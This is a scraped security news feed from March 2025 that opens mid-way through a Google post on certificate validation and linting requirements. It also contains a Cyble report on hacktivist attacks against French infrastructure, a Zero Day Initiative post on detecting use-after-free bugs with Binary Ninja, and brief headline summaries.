The Chrome Root Program led a work team of ecosystem participants, which culminated in a CA/Browser Forum Ballot to require adoption of MPIC via Ballot SC-067. The ballot received unanimous support from organizations who participated in voting.
Beginning March 15, 2025, CAs issuing publicly-trusted certificates must now rely on MPIC as part of their certificate issuance process. Some of these CAs are relying on the Open MPIC Project to ensure their implementations are robust and consistent with ecosystem expectations.

We’d especially like to thank Henry Birge-Lee, Grace Cimaszewski, Liang Wang, Cyrill Krähenbühl, Mihir Kshirsagar, Prateek Mittal, Jennifer Rexford, and others from Princeton University for their sustained efforts in promoting meaningful web security improvements and ongoing partnership.

Linting

Linting refers to the automated process of analyzing X.509 certificates to detect and prevent errors, inconsistencies, and non-compliance with requirements and industry standards. Linting ensures certificates are well-formatted and include the necessary data for their intended use, such as website authentication. Linting can expose the use of weak or obsolete cryptographic algorithms and other known insecure practices, improving overall security.

Linting improves interoperability and helps CAs reduce the risk of non-compliance with industry standards (e.g., CA/Browser Forum TLS Baseline Requirements). Non-compliance can result in certificates being "mis-issued". Detecting these issues before a certificate is in use by a site operator reduces the negative impact associated with having to correct a mis-issued certificate.

There are numerous open-source linting projects in existence (e.g., certlint, pkilint, x509lint, and zlint), in addition to numerous custom linting projects maintained by members of the Web PKI ecosystem. “Meta” linters, like pkimetal, combine multiple linting tools into a single solution, offering simplicity and significant performance improvements to implementers compared to implementing multiple standalone linting solutions.
Last spring, the Chrome Root Program led ecosystem-wide experiments, emphasizing the need for linting adoption due to the discovery of widespread certificate mis-issuance. We later participated in drafting CA/Browser Forum Ballot SC-075 to require adoption of certificate linting. The ballot received unanimous support from organizations who participated in voting. Beginning March 15, 2025, CAs issuing publicly-trusted certificates must now rely on linting as part of their certificate issuance process.

What’s next?

We recently landed an updated version of the Chrome Root Program Policy that further aligns with the goals outlined in “Moving Forward, Together.” The Chrome Root Program remains committed to proactive advancement of the Web PKI. This commitment was recently realized in practice through our proposal to sunset demonstrated weak domain control validation methods permitted by the CA/Browser Forum TLS Baseline Requirements. The weak validation methods in question are now prohibited beginning July 15, 2025.

It’s essential we all work together to continually improve the Web PKI, and reduce the opportunities for risk and abuse before measurable harm can be realized. We continue to value collaboration with web security professionals and the members of the CA/Browser Forum to realize a safer Internet. Looking forward, we’re excited to explore a reimagined Web PKI and Chrome Root Program with even stronger security assurances for the web as we navigate the transition to post-quantum cryptography. We’ll have more to say about quantum-resistant PKI later this year.
by Google Security Blog
2025-03-27 16:44:41
AI technologies in Kaspersky SIEM | Kaspersky official blog
How and why we deploy artificial intelligence in our SIEM system Kaspersky Unified Monitoring and Analysis.
by Kaspersky
2025-03-27 16:39:49
When Getting Phished Puts You in Mortal Danger
Many successful phishing attacks result in a financial loss or malware infection. But falling for some phishing scams, like those currently targeting Russians searching online for organizations that are fighting the Kremlin war machine, can cost you your freedom or your life.
by Krebs on Security
2025-03-27 16:34:00
Deleting your personal info from Google Search is stunningly easy now - and fast
Does your phone number or home address show up on Google Search? Here's what you can do about it.
by ZDNET Security
2025-03-27 16:26:17
Keeper Unveils Latest WearOS App for Android
Keeper Security has unveiled its latest improvements to the Keeper WearOS app that accompanies their flagship password management solution. The upscaled app enhances security and ease for smartwatch users. The update aligns with Google’s latest Android guidelines, providing a more intuitive and streamlined experience for Android WearOS users. The Keeper WearOS app, formerly known as KeeperDNA, […] The post Keeper Unveils Latest WearOS App for Android appeared first on IT Security Guru.
by IT Security Guru
2025-03-27 16:24:42
Hacktivists Increasingly Target France for Its Diplomatic Efforts

According to a Cyble report sent to clients recently, France is increasingly becoming a target of hacktivists for its active role in international diplomacy and in ongoing conflicts in Ukraine and the Middle East. France’s role in those conflicts “has drawn the ire of pro-Russian and pro-Palestinian hacktivist groups,” Cyble said, as those hacktivists have found ideological alignment and a common adversary in France. The attacks have ranged from Distributed Denial-of-Service (DDoS) attacks against French government institutions and other critical infrastructure to attacks against Industrial Control Systems (ICS), with the goal of disrupting essential services, influencing public opinion, and creating political pressure.

Hacktivist Alliance Began with ‘Holy League’

Pro-Russian and pro-Palestinian hacktivists collaborated in the December “Holy League” attacks against French infrastructure and have picked up significantly since January, although Holy League activity against France could also be seen months earlier following the arrest in France of Telegram founder and CEO Pavel Durov.

Cyble threat intelligence researchers listed 13 hacktivist groups that have been active in attacks against France this year:
- NoName057(16)
- Z-pentest
- Keymous+
- RipperSec
- Sector 16
- Cyber Jund (formerly Anonymous Morocco)
- Special Forces of the Electronic Army
- New Republic of Golden Falcon Team
- Anonymous Sudan
- Spider-X
- Rachel Hunter
- Mr Hamza
- DxPloit

NoName has been the most active group, responsible for 30% of the hacktivist attacks, while Z-pentest has been the second most active group with 20% of the attacks. DDoS attacks account for 73% of the attacks, while ICS breaches account for the other 27%.
Hacktivism in France Up Significantly

Looking at the broadest measure of hacktivist activity – chatter on the groups’ underground channels – Cyble detected 845 mentions of activity targeting France in the first three months of 2025, up nearly 50% from the same period a year earlier. Those mentions may also include other communications, such as sharing news and offers of help in conducting cyberattacks, so that data is more a measure of interest than attack numbers.

Two clusters of attacks stand out in Cyble data. At least 11 French organizations faced DDoS and ICS attacks after a March 10 government announcement of military aid to Ukraine funded by interest from frozen Russian assets, and eight of the groups were involved in organized attacks against at least 10 French targets following an early February announcement of government plans to supply Ukraine with Mirage 2000-5 fighter jets.

NoName057(16), a pro-Russian group, has been “persistently targeting governmental and other sectors” since January, the Cyble report noted. Z-pentest, Golden Falcon Team and Sector 16 have primarily targeted Industrial Control Systems (ICS) in critical infrastructure environments like energy and wastewater and posted videos of members tampering with system controls, a pattern that Z-pentest, in particular, has been notably pursuing since last year. RipperSec has targeted digital services and industrial controls, while Cyber Jund (formerly Anonymous Morocco), Keymous+, Rachel Hunter, and Mr Hamza have all predominantly focused on DDoS attacks.

Analysis of the attacks by NoName057(16) reveals concentrated targeting across several key French regions. The region Île-de-France, home to Paris and many strategic economic entities, experienced the highest number of incidents, highlighting the region’s strategic and symbolic value to attackers.
Other regions significantly impacted include Provence-Alpes-Côte d’Azur, Grand Est, and northern and western regions such as Normandy, Pays de la Loire, and Hauts-de-France. In addition to government institutions such as local governments and key federal government offices, hacktivist groups have also been targeting critical sectors such as Energy and utilities, Banking and financial Services (BFSI), Transportation and logistics, and Telecommunications. Cyble noted that in critical infrastructure attacks, “hacktivists are leveraging illicit access to industrial control panels, VNCs, and HMIs to disrupt industrial operations and maximize the impact of their attacks.”

Hacktivists Hit French Critical Infrastructure

Cyble has detailed numerous attacks against French ICS and SCADA (Supervisory Control and Data Acquisition) systems. Among other attacks, the pro-Russian hacktivist group Z-Pentest claims to have gained unauthorized access to a hydroelectric power plant’s SCADA system. The group shared screenshots of turbine control settings, power output data, water flow rates, and generator synchronization parameters.

[Image: Z-pentest screenshot of alleged energy controls access]

Sector16, in collaboration with the Russian group OverFlame, claimed unauthorized access to the control systems of another hydroelectric facility in the southern region of France. Images of the control interface suggest a system “designed for managing critical operations such as water level regulation, pressure control, and turbidity monitoring,” Cyble said, along with advanced tools for monitoring and controlling parameters tied to the facility's hydroelectric operations.

Golden Falcon Team claimed responsibility for unauthorized access to an application that monitors municipal wastewater sanitation works in France.
The group released screenshots of interface control metrics such as pH levels, temperature, conductivity, and water distribution processes, which are essential for managing wastewater treatment and public sanitation operations.

Conclusion

The Cyble report underscores the importance of strong DDoS and critical infrastructure cybersecurity controls. A comprehensive, risk-based vulnerability management program, strong access controls based on Zero Trust principles, network segmentation – particularly between operational technology (OT) and IT networks – and removing or protecting web-facing access are some of the more important controls for all organizations to adopt. Cyble’s comprehensive attack surface management solutions can help organizations protect vulnerable assets, whether at the network’s edge or in the cloud.

The post Hacktivists Increasingly Target France for Its Diplomatic Efforts appeared first on Cyble.
by CYBLE
2025-03-27 15:58:21
Signal downloads spike in the US and Yemen amid government scandal
The encrypted messaging app Signal is getting some unexpected attention this week. High-ranking officials in the Trump administration, including Vice President J. D. Vance and Secretary of Defense Peter Hegseth, communicated the plans for an attack on the Yemeni Houthis via a potentially unauthorized group chat on Signal. However, Atlantic editor-in-chief Jeffrey Goldberg was mistakenly […]
by TechCrunch
2025-03-27 15:56:00
New Threat on the Prowl: Investigating Lynx Ransomware
Lynx ransomware, emerging in 2024, targets finance, architecture, and manufacturing sectors with phishing and double extortion. Read on for Darktrace's findings.
by Darktrace
2025-03-27 15:30:00
Top 3 MS Office Exploits Hackers Use in 2025 – Stay Alert!
Hackers have long used Word and Excel documents as delivery vehicles for malware, and in 2025, these tricks are far from outdated. From phishing schemes to zero-click exploits, malicious Office files are still one of the easiest ways into a victim’s system. Here are the top three Microsoft Office-based exploits still making the rounds this year and what you need to know to avoid them. 1.
by The Hacker News
2025-03-27 15:15:00
Think your Venmo is private? You should double-check this setting
Your Venmo activity is public by default. Here's why that's a problem and how to fix it.
by ZDNET Security
2025-03-27 15:04:29
MindshaRE: Using Binary Ninja API to Detect Potential Use-After-Free Vulnerabilities

Use-after-free is a memory corruption condition where a program references memory after it has been released back to the allocator. Statically detecting these bugs can be challenging. In the past, several approaches have addressed this problem, such as GUEB by Josselin Feist and Sean Heelan's work on Finding use-after-free bugs with static analysis. This blog post explores the usage of Binary Ninja’s Medium Level Intermediate Language (MLIL) to establish a data flow graph by tracing interactions between a specific memory allocation and other memory regions. Building on the data flow graph, it is further utilized in context-insensitive reachability analysis across functions to identify potential Use-After-Free (UAF) vulnerabilities in binaries. Like any other static code analysis approach, this one also has classification errors; while acknowledging them, we highlight primitives that may also be adaptable for modeling other types of vulnerabilities.

For readers interested in Binary Ninja APIs, refer to our earlier blog post, which comprehensively explains using Binary Ninja Intermediate Languages (ILs) and Static Single Assignment (SSA) form.

Building a Data Flow Graph of Memory Allocation

In this context, data refers to the pointer associated with a specific memory allocation that is the subject of tracking and analysis.
The data flow information is visualized as a graph, where:
• Nodes represent different memory regions.
• Edges represent pointer store operations that establish relationships or interactions between these regions.

In this implementation, four distinct types of nodes are utilized to construct the data flow graph, each serving a specific purpose:
- Tracked Allocation Node (Red): Represents a memory allocation of interest, and acts as the focal point for tracking interactions across the graph.
- Function Stack Frame Nodes (Green): Represent the stack frames of individual functions visited during inter-procedural analysis.
- Dynamic Memory Nodes (Blue): Represent Static Single Assignment (SSA) variables that cannot be tied to a specific source. These could include dynamically allocated memory or arguments passed to functions for which we lack insights within the scope of the function.
- Global Memory Nodes (Black): Global variables across functions are not comprehensively tracked. However, these nodes help analyze interactions within a single function.

The edges in the graph represent pointer store operations, establishing connections between memory allocations. The source node corresponds to the memory being written to and the destination node represents the pointer value being stored. The edge attributes capture the offsets from allocation base addresses. The “write” attribute indicates the offset from the base of an allocation (source node) where the pointer is written to, and the “points” attribute indicates the offset within an allocation (destination node) that the written pointer value points to. New edges are created for every unique value of the “write” or “points” attribute. Write operations to stack memory are represented using absolute values from the base of the stack as represented by Binary Ninja and hence will have negative offsets for most architectures. When the “write” or “points” attribute is 0, it refers to the base of an allocation.
Edges are additionally created during unresolved memory load operations, assuming that the relevant memory store occurred outside the function scope. This graphical representation helps understand how memory regions interact. Below is a section of a sample graph generated during analysis of OpenSLP, providing better clarity on the details described:

Figure 1 - Section of Data Graph

Mapping Relationships Between SSA Variables, Graph Nodes, and Edges

Now that we have an understanding of our graph structure, let's explore how SSA variables are mapped to the nodes in the data flow graph. In our automated analysis, the first SSA variable to be tracked is the one assigned the return value of an allocator call, such as malloc() or calloc(). Furthermore, a Binary Ninja GUI interface could be developed to enable users to mark arbitrary variables for tracking and include them in further analysis. Once we identify the SSA variable of interest, we can leverage the definition-use chain to traverse all its uses within the function. Binary Ninja provides the get_ssa_var_definition() and get_ssa_var_uses() APIs to retrieve a variable's definition site and its uses, respectively. Consider the below C code and Binary Ninja’s MLIL SSA representation of the same:

Here, the return value of call to malloc() is written to SSA variable rax#1 and the further usage of rax#1 in the function can be fetched using get_ssa_var_uses() API:

A variable points to a node, and in this context, rax#1 points to the Tracked Allocation Node (Red). When rax#1 is assigned to var_10#1, this information is propagated to var_10#1 and subsequently to any further assignments. When a variable assignment involves pointer arithmetic, a piece of offset information is stored in addition to the node. In this case, the offset is 0 because all the variables point to the base of the Tracked Allocation Node.
The ptr variable in the function stack is represented by the SSA variable var_10#1, which stores the pointer to the allocated memory. The offset for this variable can be extracted and represented as an edge in the graph. In essence, two data structures are constructed: a dictionary that maps SSA variables to nodes and a graph that connects various memory regions, represented as nodes. Since SSA variables are associated with their specific functions, they can be uniquely identified across functions during inter-procedural analysis.

Figure 2 - Connection Between Tracked Allocation Node (Red) and Stack Frame Node (Green)

The following code snippet demonstrates the creation of a Tracked Allocation Node (Red node) and the initialization of the SSA variable dictionary, which contains information about the SSA variable and the node it references:

Let's examine another example of code and its MLIL translation to understand the process of creating a Dynamic Memory Node (Blue). Within the function scope, there is no information about the location recptr points to. When recptr->link is initialized with the return value of a call to malloc(), a Dynamic Memory Node is created with an edge to the Tracked Allocation Node. This corresponds to the MLIL instruction 0000118a [rax_1#2 + 8].q = rdx#1 @ mem#1 -> mem#2 (MLIL_STORE_SSA), where the edge attribute contains the offset information. The variable rax_1#2 can be tracked back to arg1#0 using the SSA use-def chain.

Figure 3 - Connection Between Tracked Allocation Node (Red) and Dynamic Memory Node (Blue)

Essentially, whenever memory store operations such as MLIL_SET_VAR_SSA, MLIL_STORE_SSA, or MLIL_STORE_STRUCT_SSA are encountered, edges are created in the graph. In Binary Ninja’s MLIL SSA form, MLIL_SET_VAR_SSA is not strictly a memory store operation since stack writes are translated to SSA variables. However, the variables still retain offset information, which can be used to construct the data flow graph.
Translating Memory Loads to Graph Edges

While memory store operations are translated into graph edges, as previously discussed, load operations from memory outside the function scope are also represented as graph edges. Consider the following example:

Within the function scope, there is no specific information about recptr. However, when the pointer returned by malloc() is written to recptr_new->link, this memory is traced back to the argument passed, i.e., recptr (arg1#0), using the SSA use-def chain. The memory load operation recptr->link is translated to 0000117d rax_1#2 = [rax#1 + 8].q @ mem#0 in the MLIL SSA representation. This load operation is represented as an edge between arg1#0 and rax_1#2. The underlying assumption here is that if the memory is being loaded, it must have been initialized beforehand. Memory store, assignment, and load operations serve as the fundamental building blocks of the data flow graph.

Figure 4. Data Flow Graph Developed from Memory Store and Load Operations

Traversing the Data Flow Graph to Propagate Information

Now that we understand how variables are initialized as mappings to nodes in the graph and how memory accesses are translated to edges, the next question is: how is this information propagated when traversing instructions in the SSA def-use chain? The answer lies in the SSA variable dictionary and the graph that we initialized previously.

-- A direct variable assignment is straightforward. The value of the source variable is assigned to the destination variable. Consider an expression like rax#0 = rbx#0. Here rax#0 is assigned the value of rbx#0 from the SSA variable dictionary.

-- For a variable assignment where pointer arithmetic is involved, the node information from the source variable is directly assigned to the destination variable, just as in the case of direct assignment. However, in this situation, the offset information is updated to reflect the pointer arithmetic operation. Consider an expression like rax#0 = rbx#0 + 0x10. Here rax#0 is assigned the node pointed to by source variable rbx#0, but the offset value is set to 16.

-- For a variable assignment where data is loaded from memory, like rax_1#2 = [rax#1 + 8].q, the edges of the graph are visited to fetch the target node pointed to by the source variable. To detail further, the node and the offset associated with rax#1 (the base variable) are fetched from the SSA variable dictionary. Then the final offset is computed as the sum of the "offset" fetched from the SSA variable dictionary and the offset from the load instruction. Once the node and the computed offset are available, we find the edge whose "write" offset equals the computed offset by walking through all the edges of the node. The destination node and "points" offset associated with this edge are assigned to rax_1#2. Essentially, we resolve a memory load operation to node and offset values, which can be used to update the SSA variable dictionary. Below is the code snippet to demonstrate this:

Callees are visited after all the instructions in the def-use chain of the calling function have been processed. A callee is considered for further analysis only if any of the arguments passed to the function have mappings in the SSA variable dictionary. Recursion is managed by monitoring the call stack for repeated calls to the same function and terminating the analysis after a predefined number of iterations. In cases where stack memory is passed as an argument, the callee is also analyzed if the stack offset passed is less than the write offset value of any edges associated with the respective Function Stack Frame Nodes (Green).
This consideration ensures that even if a structure element is initialized within a function and the base of the structure is passed to the callee (with the stack growing downwards and using negative offsets), the analysis accounts for it appropriately. Once the instructions in the SSA def-use chains of both the caller and callees have been traversed, the data flow graph generation is considered complete, with all variable information fully populated for further analysis.

Logging Instructions Linked to Tracked Allocation

After completing the SSA variable mapping and generating the data flow graph, the instructions are revisited. All memory loads, memory stores, or call instructions dependent on the Tracked Allocation Node are recorded, along with the statically generated call stack. These are considered as "Use". Additionally, call instructions involving deallocator functions are logged and considered as "Free". Below is a sample code snippet for handling the MLIL_STORE_SSA instruction:

Inter-Procedural Analysis for Use-After-Free Detection via Call Stack

Once the logging is done, detecting potential use-after-free bugs involves analyzing all basic blocks categorized as "Free" and verifying whether any paths lead to basic blocks categorized as "Use". If such a path exists, it is flagged as a potential use-after-free condition. Since double-free bugs are related to use-after-free, the analysis also examines whether a path exists from one "Free" block to another "Free" block. If such a path is detected, it is flagged and logged as a potential double-free condition.

In forward data flow analysis, there is at least one common function in the call stack leading to "Free" and the call stack leading to "Use". For example, consider a scenario where function A allocates memory and passes it to function B for use, which propagates it further to function C, where it gets freed.
The instructions using the allocation in B have a call stack of A leading to B, while the call stack for function C includes A leading to B and B leading to C. The last common function in these two call stacks is B. The analysis conducted here is not context-sensitive and focuses solely on reachability. Therefore, instead of identifying a direct path between the basic block in C that frees the memory and the instructions in B that use the memory, the analysis checks for a path within the last common function, i.e., between the basic block in B that calls function C and the basic blocks in B that use the memory. This approach allows for inter-procedural analysis while limiting the pathfinding to the last common function, improving efficiency and scope control. Otherwise, one may have to inline multiple functions into a single graph to perform reachability analysis.

Additionally, loops require special attention to minimize false positives. In loops, back edges can connect basic blocks following a deallocation to those preceding an allocation. Therefore, instructions executed after an allocation but before a deallocation can still appear reachable in the graph, potentially being misidentified as use-after-free. To mitigate this, all incoming edges to the basic block that invokes the allocator function are removed from the control flow graph. This effectively disconnects statements that would otherwise appear reachable within the loop, reducing false positive results.

Automated Detection of Allocator and Deallocator Calls

While it is ideal to use allocator and deallocator wrappers specific to the program as input for this analysis, manually identifying them can be challenging. An easier starting point is to input standard functions like malloc(), realloc(), and free(), examine the outcomes, and progressively refine the analysis based on the results.
By cross-referencing allocator functions like malloc() and leveraging def-use chains, we can determine whether the pointer returned by an allocator function is subsequently returned by the caller. If so, the caller is likely a wrapper around the allocator. For finding deallocator functions, the approach is similar to the one described as "Function aliases" by Sean Heelan. Binary Ninja's dataflow analysis can be used to verify whether any of the caller's function parameters are directly passed to a deallocator such as free(). This can be identified by checking whether the parameter's value type is RegisterValueType.EntryValue. If this condition is met, it indicates a potential wrapper around the deallocator function.

Using a JSON file with minimal allocator details, numerous functions involved in allocating and deallocating data structures were identified in OpenSLP. These discovered functions can be incorporated into the JSON file for further analysis. Currently, the "arg" key holds no significance in the implementation.

Since we perform forward data flow analysis, which involves visiting the functions that invoke the allocator call as well as the callees of those functions, identifying these wrappers allows us to shift the starting point of our analysis. Simply put, instead of beginning our analysis inside SLPMessageAlloc(), where forward data flow analysis has limited scope because it calls calloc() without further interactions, we can focus on analyzing all the functions that call SLPMessageAlloc(). This approach broadens the scope and provides better insights into the data flow.

Analyzing Real-World Vulnerabilities from the Past

To understand how the tool works, let's test it on some known vulnerable programs. Since GUEB already provides a list of identified vulnerabilities, I chose to use them as examples here.

CVE-2015-5221: JasPer JPEG-2000

There is a use-after-free/double-free vulnerability in mif_process_cmpt(), as seen in RedHat Bugzilla.
By tracking the allocation and deallocation APIs, jas_tvparser_create() and jas_tvparser_destroy() respectively, the following results are observed:

In this case, mif_process_cmpt() is inlined into mif_hdr_get(), and the results are displayed accordingly.

CVE-2016-3177: Giflib

Here is a double-free vulnerability in gifcolor - #83 Use-after-free / Double-Free in gifcolor. In this case, the allocation and deallocation APIs used were EGifOpenFileHandle() and EGifCloseFile(), respectively, and the results are as follows:

GNOME-Nettool

This is a use-after-free vulnerability in get_nic_information() - Bug 753184. For this analysis, the g_malloc0() and free() pair is tracked:

Figure 5. UAF in get_nic_information

CVE-2015-5177: OpenSLP

This double-free issue in SLPDProcessMessage() - #1251064 demonstrates a different scenario compared to the previous bugs. The earlier cases involved allocation, free, and use within the same function. However, in this double-free case, we observe the effectiveness of inter-procedural analysis. This highlights how bugs spanning multiple functions can be detected, providing a broader scope of analysis for complex code paths.

Pointers to memory allocated by SLPMessageAlloc() in SLPDProcessMessage() and by SLPBufferAlloc() are passed to ProcessDAAdvert() when the message ID is set to SLP_FUNCT_DAADVERT. Within ProcessDAAdvert(), these pointers are further passed to SLPDKnownDAAdd(). If an error occurs in SLPDKnownDAAdd(), the buffers are freed using SLPMessageFree() and SLPBufferFree(), and a non-zero error code is returned to SLPDProcessMessage(). Subsequently, when SLPDProcessMessage() detects the non-zero error code, it attempts to free the same buffers again, resulting in a double-free condition. The upstream fix for this issue is found here - fix double free if SLPDKnownDAAdd() fails:

Interestingly, two double-free issues are reported due to SLPMessageFree(), even though SLPDKnownDAAdd() frees these pointers only once in the code.
This discrepancy occurs because the compiler, for optimization purposes, generates multiple basic blocks for the same target of a goto statement. This leads to multiple results being reported. Our implementation does not track the buffer allocated through SLPBufferAlloc() because the pointers are passed across functions via global memory, which is not currently within the scope of our tracking.

Currently, the logging is very primitive. Every instruction classified as a potential UAF condition is logged individually. Readability could be improved significantly by instead grouping the instructions by basic block or by function.

Conclusion

I hope you have enjoyed this look at using Binary Ninja to find use-after-free vulnerabilities through data flow analysis and graph reachability. The source code for the project can be found here - uafninja. If you find any vulnerabilities using these methods, consider submitting them to our bounty program. Until then, you can find me on Twitter at @RenoRobertr, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

Acknowledgments and References
• Various blog posts from Trail of Bits on Binary Ninja
• Josh Watson for various projects using Binary Ninja. The visitor class implementation is based on emilator
• Jordan for all the code snippets and the Binary Ninja slack community for answering various questions
• GUEB Static analyzer by Josselin Feist
• Sean Heelan's work on Finding use-after-free bugs with static analysis.
by Zero Day Initiative Blog
2025-03-27 15:01:20
“This fraud destroyed my life.” Man ends up with criminal record after ID was stolenA man didn't just have his ID stolen; identity theft ruined his life and robbed him of a promising future.
by Malwarebytes Labs
2025-03-27 14:43:38
How to protect your site from DDoS attacks - before it's too lateDDoS attacks don't take much technical expertise to launch these days. Defending against them is more complicated.
by ZDNET Security
2025-03-27 14:33:06
Student-Powered SOCs Train Security's Next GenerationUniversity security operations centers that hire and train students are a boon to state and local governments while giving much-needed Tier 1 cybersecurity training to undergraduates.
by Dark Reading
2025-03-27 14:29:00
10 pesky Windows 11 24H2 bugs still haunting PCs despite several patchesBefore diving into the Windows 11 2024 update, know that you may encounter some problems. Here's the bug report now.
by ZDNET Security
2025-03-27 14:07:44
Moving from WhatsApp to Signal: A good idea?Is moving from WhatsApp to Signal a good idea? We look at the pros and cons, and which settings can make Signal even more private.
by Malwarebytes Labs
2025-03-27 14:00:00
Go-Spoof: A Tool for Cyber DeceptionGo-Spoof brings an old tool to a new language. The Golang rewrite [of Portspoof] provides similar efficiency and all the same features of the previous tool but with easier setup and usability. The post Go-Spoof: A Tool for Cyber Deception appeared first on Black Hills Information Security, Inc..
by Black Hills Information Security
2025-03-27 13:43:00
150,000 Sites Compromised by JavaScript Injection Promoting Chinese Gambling PlatformsAn ongoing campaign that infiltrates legitimate websites with malicious JavaScript injects to promote Chinese-language gambling platforms has ballooned to compromise approximately 150,000 sites to date. "The threat actor has slightly revamped their interface but is still relying on an iframe injection to display a full-screen overlay in the visitor's browser," c/side security analyst Himanshu
by The Hacker News
2025-03-27 13:42:41
Surge in Phishing Attacks Hijacking Legitimate Microsoft CommunicationsA KnowBe4 Threat Lab Publication. Authors: James Dyer, Threat Intelligence Lead at KnowBe4, and Lucy Gee, Cybersecurity Threat Researcher at KnowBe4. On March 3, 2025, the KnowBe4 Threat Labs team observed a massive influx of phishing attacks originating from legitimate Microsoft domains.
by KnowBe4
2025-03-27 13:23:08
Fake DeepSeek Ads Spread Malware to Google UsersPopularity of the generative AI platform makes it an obvious choice for cybercriminals abusing Google-sponsored search results, according to researchers.
by Dark Reading